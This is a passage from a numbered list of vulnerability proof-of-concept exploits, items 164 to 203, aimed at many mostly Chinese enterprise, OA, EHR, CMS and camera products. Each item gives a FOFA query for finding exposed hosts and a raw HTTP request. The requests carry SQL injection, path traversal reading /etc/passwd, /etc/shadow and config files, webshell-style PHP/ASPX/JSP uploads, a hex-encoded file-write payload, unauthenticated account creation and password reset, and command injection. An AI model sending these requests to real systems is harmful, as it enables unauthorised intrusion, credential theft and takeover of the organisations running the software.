Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload interface file upload

1. Run the POC to obtain the CSRF value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1
Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92; path=/
FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"

-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--